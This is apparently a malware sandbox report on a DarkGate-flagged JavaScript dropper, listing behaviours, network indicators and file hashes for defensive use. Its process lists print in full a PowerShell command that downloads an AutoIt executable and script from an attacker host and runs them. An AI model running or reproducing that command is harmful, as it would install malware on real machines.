Analysis Overview
SHA256
c1c99b9831d48df390c46dc373f8f5691364aa0118cc50484f0efcb2c8cad4df
Threat Level: Known bad
The file 04112023_0757_online-package(0x1010010).js was found to be: Known bad.
Malicious Activity Summary
DarkGate
Suspicious use of NtCreateUserProcessOtherParentProcess
Downloads MZ/PE file
Blocklisted process makes network request
Checks computer location settings
Executes dropped EXE
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-03 23:57
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-03 23:57
Reported
2023-11-03 23:59
Platform
win7-20231023-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1728 wrote to memory of 2308 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1728 wrote to memory of 2308 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1728 wrote to memory of 2308 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\04112023_0757_online-package(0x1010010).js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443/msiegcubitm' -OutFile 'egcubitm.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'egcubitm.au3'"; Stop-Process -Name "WScript"
Network
Files
memory/2308-4-0x000000001B170000-0x000000001B452000-memory.dmp
memory/2308-5-0x0000000002410000-0x0000000002418000-memory.dmp
memory/2308-6-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp
memory/2308-7-0x0000000002880000-0x0000000002900000-memory.dmp
memory/2308-8-0x0000000002880000-0x0000000002900000-memory.dmp
memory/2308-9-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp
memory/2308-10-0x0000000002880000-0x0000000002900000-memory.dmp
memory/2308-11-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-11-03 23:57
Reported
2023-11-03 23:59
Platform
win10v2004-20231023-en
Max time kernel
146s
Max time network
152s
Command Line
Signatures
DarkGate
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5104 created 616 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\tepp\AutoIt3.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5104 set thread context of 880 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\SysWOW64\WerFault.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\tepp\AutoIt3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\tepp\AutoIt3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\tepp\AutoIt3.exe | N/A |
| N/A | N/A | C:\tepp\AutoIt3.exe | N/A |
| N/A | N/A | C:\tepp\AutoIt3.exe | N/A |
| N/A | N/A | C:\tepp\AutoIt3.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\04112023_0757_online-package(0x1010010).js
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443/msiegcubitm' -OutFile 'egcubitm.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'egcubitm.au3'"; Stop-Process -Name "WScript"
C:\tepp\AutoIt3.exe
"C:\tepp\AutoIt3.exe" egcubitm.au3
C:\Windows\SysWOW64\WerFault.exe
"C:\Windows\SysWOW64\WerFault.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sftp.noheroway.com | udp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 8.8.8.8:53 | 224.101.174.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sftp.noheroway.com | udp |
| US | 185.174.101.224:8080 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 8.8.8.8:53 | 67.254.221.88.in-addr.arpa | udp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
| US | 185.174.101.224:443 | sftp.noheroway.com | tcp |
Files
memory/4492-0-0x0000024B34B10000-0x0000024B34B32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d1s0vzjy.xqj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4492-10-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp
memory/4492-11-0x0000024B34B60000-0x0000024B34B70000-memory.dmp
memory/4492-12-0x0000024B34B60000-0x0000024B34B70000-memory.dmp
memory/4492-13-0x0000024B34B60000-0x0000024B34B70000-memory.dmp
C:\tepp\AutoIt3.exe
| MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
| SHA256 | 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
| SHA512 | 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c |
C:\tepp\AutoIt3.exe
| MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
| SHA256 | 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
| SHA512 | 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c |
C:\tepp\egcubitm.au3
| MD5 | 3e44ad030b24484b630393ef879e0732 |
| SHA1 | 1d6b6bbf4d131ba8112560e2c854a2fc486570be |
| SHA256 | c2c39841c43ee502a8c6dc023cfb847e98a308f0e640d82d81351e41113fbbf2 |
| SHA512 | 295094cd8ee23c6206eaacc9e056328711d4d43a70bd18499fcca8008269d49aefc2a765ac39ddc630634b7403f00fbd4bb705b58639e4d0806a500715fd1ad4 |
memory/5104-29-0x0000000000C00000-0x0000000001000000-memory.dmp
memory/5104-30-0x0000000003EE0000-0x000000000420A000-memory.dmp
C:\tepp\AutoIt3.exe
| MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
| SHA256 | 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
| SHA512 | 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c |
memory/4484-37-0x0000000001260000-0x00000000012C6000-memory.dmp
memory/4484-38-0x0000000001260000-0x00000000012C6000-memory.dmp
memory/4492-39-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp
memory/880-40-0x0000000000400000-0x0000000000465000-memory.dmp
memory/5104-41-0x0000000000C00000-0x0000000001000000-memory.dmp
memory/5104-43-0x0000000003EE0000-0x000000000420A000-memory.dmp
memory/880-42-0x0000000000400000-0x0000000000465000-memory.dmp
memory/880-44-0x0000000000400000-0x0000000000465000-memory.dmp